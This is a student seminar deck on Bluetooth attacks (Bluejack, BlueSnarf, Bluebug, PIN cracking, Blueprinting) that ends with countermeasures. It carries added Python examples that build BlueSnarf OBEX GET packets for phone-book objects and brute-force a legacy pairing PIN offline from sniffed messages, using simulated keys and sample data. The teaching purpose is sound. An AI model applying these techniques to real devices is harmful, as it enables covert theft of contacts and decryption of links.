Bluetooth Hacking


Seminar on

Bluetooth Hacking
[security and threats]

By-
Dhanashree Waikar
Roll No – 3379

Project Guide – Prof. N. R. Talhar


Overview
• Introduction
• Bluejack attack
• Bluespamming
• The Bluesnarf attack
• The Bluebug attack
• Helomoto
• Crack pin code
• Blueprinting
• Other attacks [Trojans, Viruses, worms]
• Security levels
• Countermeasures
September 8, 2020 2
Bluetooth introduction
• Wireless networking technology
• For short-range devices
• Operates in the 2.4 GHz ISM band
• Range is typically 10 to 30 m
• Data transfer rate is 1 Mbps
• Bluetooth SIG
• Founded in 1998
• Trade association
• Owns and licenses the Bluetooth IP

Bluejack
• OBEX push attack
• OBEX (Object Exchange) is the protocol devices
use to exchange data with one another (files,
pictures, business cards, calendar entries
etc.)
• Commonly sends a 'business card' carrying
the message via OBEX Push
• Variants
• Bluetoothing
• Bluechatting
• Modifying a remote mobile phone's
address book
• Bluespamming
BlueSnarf Attack
• Discovered by Marcel Holtmann
• Published in October 2003
• BlueSnarf exploits weak OBEX
implementations on mobile phones
• OBEX pull attack
• The attacker uses the OBEX protocol to
forcibly pull sensitive data out of the
victim's mobile phone
• Affected phones are extremely vulnerable;
serious damage is possible through bluesnarfing
BlueSnarf Attack continued…
• Can steal sensitive data without the
knowledge of the victim
• Address book, photographs,
• music, videos, calendar,
• IMEI number, reading/decoding SMS
messages etc.
• The adversary connects to the OBEX Push profile
• No authentication, no pairing needed
-> invisible connection
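Bluejack (an OBEX PUT that pushes a business card) and BlueSnarf (an OBEX GET that pulls a known object) are both plain OBEX packets sent over an unauthenticated RFCOMM channel; the only difference is the opcode and the headers. The following Python is an added example, not code from this seminar, that encodes and decodes OBEX packets so the two requests can be compared byte for byte. It assumes the object names telecom/pb.vcf (phone book) and telecom/cal.vcs (calendar) from the IrMC specification, which the original BlueSnarf work targeted; the vCard and the victim's reply are constructed sample data, and no Bluetooth socket is opened, the packets are only built and parsed.

```python
import struct

# OBEX request opcodes with the "final" bit (0x80) set, the success response
# code, and the header identifiers used below (IrDA OBEX specification).
OP_CONNECT, OP_DISCONNECT, OP_PUT, OP_GET = 0x80, 0x81, 0x82, 0x83
RESP_OK = 0xA0
HDR_NAME, HDR_TYPE, HDR_LENGTH, HDR_BODY, HDR_END_OF_BODY = 0x01, 0x42, 0xC3, 0x48, 0x49
OBEX_VERSION = 0x10


def hdr_unicode(hid, text):
    """Header kind 0b00: null-terminated UTF-16BE string, 2-byte total length."""
    payload = text.encode("utf-16-be") + b"\x00\x00"
    return struct.pack(">BH", hid, 3 + len(payload)) + payload


def hdr_bytes(hid, data):
    """Header kind 0b01: byte sequence with 2-byte total length."""
    return struct.pack(">BH", hid, 3 + len(data)) + data


def hdr_u32(hid, value):
    """Header kind 0b11: one 4-byte big-endian value."""
    return struct.pack(">BI", hid, value)


def packet(opcode, fields=b"", headers=b""):
    """opcode (1) + total length (2, big-endian, includes these 3) + fields + headers."""
    body = fields + headers
    return struct.pack(">BH", opcode, 3 + len(body)) + body


def connect_request(max_packet=0x2000):
    """CONNECT carries version, flags and the maximum packet length we accept."""
    return packet(OP_CONNECT, struct.pack(">BBH", OBEX_VERSION, 0x00, max_packet))


def bluejack_push(vcard, name="card.vcf"):
    """Bluejack: OBEX PUT of a vCard. The victim only sees a 'business card
    received' prompt; nothing is read from the phone."""
    headers = (hdr_unicode(HDR_NAME, name)
               + hdr_bytes(HDR_TYPE, b"text/x-vcard\x00")
               + hdr_u32(HDR_LENGTH, len(vcard))
               + hdr_bytes(HDR_END_OF_BODY, vcard))
    return packet(OP_PUT, headers=headers)


def bluesnarf_pull(name="telecom/pb.vcf"):
    """BlueSnarf: OBEX GET for a well-known IrMC object name (assumed here:
    telecom/pb.vcf = phone book, telecom/cal.vcs = calendar). A weak OBEX
    Push server answers it without any pairing."""
    headers = hdr_unicode(HDR_NAME, name) + hdr_bytes(HDR_TYPE, b"text/x-vcard\x00")
    return packet(OP_GET, headers=headers)


def parse_headers(data):
    """Decode the header list; the top two bits of each HI byte give its kind."""
    headers, i = {}, 0
    while i < len(data):
        hid, kind = data[i], data[i] >> 6
        if kind in (0, 1):
            length = struct.unpack_from(">H", data, i + 1)[0]
            value = data[i + 3:i + length]
            if kind == 0:
                value = value[:-2].decode("utf-16-be")
            i += length
        elif kind == 2:
            value, i = data[i + 1], i + 2
        else:
            value, i = struct.unpack_from(">I", data, i + 1)[0], i + 5
        headers[hid] = value
    return headers


def parse_packet(data, field_len=0):
    """Return (opcode or response code, opcode-specific fields, headers).
    The length field must cover exactly the bytes given; a parser that
    trusts it blindly is the kind of weak implementation BlueSnarf abuses."""
    opcode, length = struct.unpack_from(">BH", data)
    if length != len(data):
        raise ValueError("OBEX length field %d != %d bytes received" % (length, len(data)))
    return opcode, data[3:3 + field_len], parse_headers(data[3 + field_len:])


def victim_reply(vcard):
    """Constructed success response a weak OBEX server sends to the GET."""
    return packet(RESP_OK, headers=hdr_bytes(HDR_END_OF_BODY, vcard))


def pulled_object(response):
    """What the attacker extracts from the reply: the object body, or None."""
    code, _, headers = parse_packet(response)
    return headers.get(HDR_END_OF_BODY) if code == RESP_OK else None


# Constructed sample phone-book entry standing in for the victim's data.
SAMPLE_VCARD = b"BEGIN:VCARD\r\nVERSION:2.1\r\nN:Doe;Jane\r\nTEL:+15555550100\r\nEND:VCARD\r\n"

if __name__ == "__main__":
    print("bluejack PUT :", bluejack_push(SAMPLE_VCARD).hex())
    print("bluesnarf GET:", bluesnarf_pull().hex())
    print(pulled_object(victim_reply(SAMPLE_VCARD)).decode())
```

The two request dumps differ only in the opcode byte (0x82 versus 0x83) and in whether a body is carried; the protection a phone gets against BlueSnarf is therefore not in OBEX itself but in refusing GET on the Push channel and requiring pairing for the sync objects.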

Bluebug
• Discovered by Martin Herfurt
• Public field test - CeBIT 2004
• Full access to the AT command set, hence
full phone control
• Based on AT commands -> not OBEX
• Typical use cases:
• Call control (turning the phone into a bug)
• Initiating a new call to a predefined number

Helomoto
• Bluesnarf + Bluebug
• Requires an entry in the 'Device History'
• OBEX PUSH is used to create that entry
• Connect RFCOMM to the Hands-Free or
Headset service
• No authentication required
• Full AT command set access

Pairing
• When two devices first meet, they
"pair"
• The device initiating the connection (the
master) must know the other device's
BD_ADDR, through inquiry or user input
• Pairing information is recorded and may
contain authentication credentials
• Inquiry mode is no longer necessary afterwards,
since the BD_ADDR has been recorded

Creation of k_init
[figure: creation of k_init]

Creation of k_ab
[figure: creation of k_ab]

Mutual authentication
[figure: mutual authentication]

The Basic Attack
[figure: list of messages sent during the pairing and
authentication process]

The Basic Attack Structure
[figure: the basic attack structure]
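The figures above cover the legacy (pre-Secure Simple Pairing) exchange: A sends IN_RAND in the clear; both sides derive k_init = E22(PIN, BD_ADDR_B, IN_RAND); each side sends its LK_RAND masked by XOR with k_init; k_ab = E21(LK_RAND_A, BD_ADDR_A) XOR E21(LK_RAND_B, BD_ADDR_B); then each side challenges the other with an AU_RAND and checks the 32-bit SRES = E1(k_ab, BD_ADDR_claimant, AU_RAND). Everything an eavesdropper needs to test a PIN guess offline is therefore on the air. The Python below is an added example, not code from these slides, that runs that exchange and the basic attack against it. It assumes SHA-256-based stand-ins for E22, E21 and E1 (in the specification they are SAFER+ based; only the message flow matters for the attack), constructed BD_ADDRs, and a numeric PIN of known length.

```python
import hashlib
import os


def _h(*parts):
    """16-byte stand-in for the SAFER+-based key functions of the specification."""
    return hashlib.sha256(b"|".join(parts)).digest()[:16]


def e22(pin, bd_addr, in_rand):
    """Initialisation key: k_init = E22(PIN, BD_ADDR_B, IN_RAND)."""
    return _h(b"E22", pin, bd_addr, in_rand)


def e21(lk_rand, bd_addr):
    """Per-device contribution to the link key; the two are XORed into k_ab."""
    return _h(b"E21", lk_rand, bd_addr)


def e1(key, bd_addr, au_rand):
    """Authentication response SRES = E1(K, BD_ADDR_claimant, AU_RAND), 32 bits."""
    return _h(b"E1", key, bd_addr, au_rand)[:4]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed device addresses for the example (not real devices).
ADDR_A = bytes.fromhex("001122334455")
ADDR_B = bytes.fromhex("66778899aabb")


def pair_and_authenticate(pin, addr_a, addr_b, rng=os.urandom):
    """Legacy pairing followed by mutual authentication, A initiating.
    Returns what an eavesdropper sees, plus the real k_ab for comparison."""
    in_rand = rng(16)                                  # 1. A -> B, in the clear
    k_init = e22(pin, addr_b, in_rand)                 # both sides, from the PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    msg_a = xor(lk_rand_a, k_init)                     # 2. A -> B
    msg_b = xor(lk_rand_b, k_init)                     # 3. B -> A
    k_ab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    au_rand_a = rng(16)                                # 4. A challenges B
    sres_b = e1(k_ab, addr_b, au_rand_a)               # 5. B answers
    au_rand_b = rng(16)                                # 6. B challenges A
    sres_a = e1(k_ab, addr_a, au_rand_b)               # 7. A answers
    sniffed = {"in_rand": in_rand, "msg_a": msg_a, "msg_b": msg_b,
               "au_rand_a": au_rand_a, "sres_b": sres_b,
               "au_rand_b": au_rand_b, "sres_a": sres_a}
    return sniffed, k_ab


def crack_pin(sniffed, addr_a, addr_b, digits=4):
    """The basic attack: for every PIN of the given length re-derive k_init,
    unmask both LK_RANDs, rebuild k_ab and test it against both observed SRES
    values. Entirely offline; nothing is sent to either device."""
    for n in range(10 ** digits):
        pin = str(n).zfill(digits).encode()
        k_init = e22(pin, addr_b, sniffed["in_rand"])
        lk_rand_a = xor(sniffed["msg_a"], k_init)
        lk_rand_b = xor(sniffed["msg_b"], k_init)
        k_ab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
        if (e1(k_ab, addr_b, sniffed["au_rand_a"]) == sniffed["sres_b"]
                and e1(k_ab, addr_a, sniffed["au_rand_b"]) == sniffed["sres_a"]):
            return pin, k_ab
    return None


if __name__ == "__main__":
    sniffed, real_key = pair_and_authenticate(b"4711", ADDR_A, ADDR_B)
    pin, key = crack_pin(sniffed, ADDR_A, ADDR_B)
    print("recovered PIN:", pin.decode(), "| link key matches:", key == real_key)
```

Two checks against the SRES values (64 bits in total) rule out false positives across the 10,000 four-digit candidates, and once k_ab is known every later session keyed from it can be decrypted. The cost grows only tenfold per extra digit, which is why "avoid short pairing codes" appears among the countermeasures later on.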
Blueprinting
• Used for generating statistics about
manufacturers and models
• Bluetooth device address format:
MM:MM:MM:XX:XX:XX, where the first three
octets identify the manufacturer
• Reveals whether there are devices in range that
have issues with Bluetooth security
• Used to learn which models can be
affected
• Uses the service discovery protocol (SDP)
• Attacker sends an SDP probe -> Bluetooth device
-> the device's service records are hashed into
a fingerprint -> attacker
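The two ingredients above, the manufacturer prefix of the address and the layout of the SDP records, are enough to fingerprint a model, because phones of the same model and firmware advertise the same services on the same RFCOMM channels. The Python below is an added example, not code from the seminar or from the original Blueprinting tool: it takes a BD_ADDR and a list of SDP records and produces an OUI@hash fingerprint, then matches it against a small database. The OUI table, the SDP scan result and the fingerprint database are constructed sample data, the service class UUIDs are the Bluetooth-assigned 16-bit values, and SHA-1 over the sorted record tuples is this example's stand-in for the tool's own hash.

```python
import hashlib

# Constructed OUI table for the example; a real tool would consult the
# IEEE registry of assigned manufacturer prefixes.
OUI_TABLE = {"00:11:22": "ExampleVendor A", "66:77:88": "ExampleVendor B"}

# Bluetooth-assigned 16-bit service class UUIDs used in the sample records.
OBEX_OBJECT_PUSH, HEADSET, HANDSFREE, DIALUP_NETWORKING = 0x1105, 0x1108, 0x111E, 0x1103


def oui(bd_addr):
    """Return the MM:MM:MM manufacturer part of a MM:MM:MM:XX:XX:XX address."""
    parts = bd_addr.upper().split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError("bad BD_ADDR: %r" % bd_addr)
    for p in parts:
        int(p, 16)  # raises ValueError on a non-hex octet
    return ":".join(parts[:3])


def blueprint(bd_addr, sdp_records):
    """Fingerprint = OUI@hash. The hash covers the advertised service layout,
    one (record handle, service class UUID, RFCOMM channel) tuple per service,
    sorted so the order in which the device returns records does not matter.
    SHA-1 is this example's stand-in for the original tool's hash function."""
    layout = sorted((int(h), int(u), int(c)) for h, u, c in sdp_records)
    digest = hashlib.sha1(repr(layout).encode()).hexdigest()[:8]
    return "%s@%s" % (oui(bd_addr), digest)


# Constructed SDP scan result: what a query of a hypothetical phone returns.
SAMPLE_RECORDS = [
    (0x10000, OBEX_OBJECT_PUSH, 9),
    (0x10001, HEADSET, 1),
    (0x10002, HANDSFREE, 2),
    (0x10003, DIALUP_NETWORKING, 3),
]

# Constructed fingerprint database: one entry per firmware layout seen before,
# with the model name and the weakness that layout is known to carry.
KNOWN = {
    blueprint("00:11:22:00:00:00", SAMPLE_RECORDS):
        ("ExampleVendor A / Model X fw 1.0",
         "BlueSnarf: OBEX Push server answers GET without pairing"),
}


def identify(bd_addr, sdp_records):
    """Manufacturer from the OUI; model and known issue from the blueprint."""
    vendor = OUI_TABLE.get(oui(bd_addr), "unknown vendor")
    model, issue = KNOWN.get(blueprint(bd_addr, sdp_records), ("unknown model", None))
    return vendor, model, issue


if __name__ == "__main__":
    print(identify("00:11:22:AB:CD:EF", SAMPLE_RECORDS))
```

Because the fingerprint uses only the first three octets of the address, every unit of the same model maps to the same entry; a single changed RFCOMM channel (a different firmware) yields a different hash, which is what makes the method useful for spotting vulnerable firmware versions in range.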
Viruses, Worms and Trojans
• Viruses do not have the capability to spread and
infect devices on their own; they need a user action
(such as accepting an incoming file) to propagate.
• Worms are malicious programs that spread from
device to device on their own and cause harm to
the target device.
• Trojans are malicious files disguised as legitimate
ones that can be used for carrying out harmful
activities on the target device.
Security
• A device can implement three different security
modes:
• Nonsecure (Security Mode 1): the device will not
initiate any security measures, so communication
takes place without authentication or encryption.
• Service-level enforced security (Security Mode 2):
two devices can establish an ACL link in a
nonsecure manner; security procedures are
initiated when an L2CAP (Logical Link Control
and Adaptation Protocol) channel request is
made.
• Link-level enforced security (Security Mode 3):
security procedures are initiated when the ACL
link is being established.
Countermeasures
• Do not enable Bluetooth unless it is
necessary.
• Do not accept files, business cards or any
other incoming Bluetooth data from
unknown people.
• Avoid using short pairing codes.
• Change the default device name.

Any Questions?

Thank you

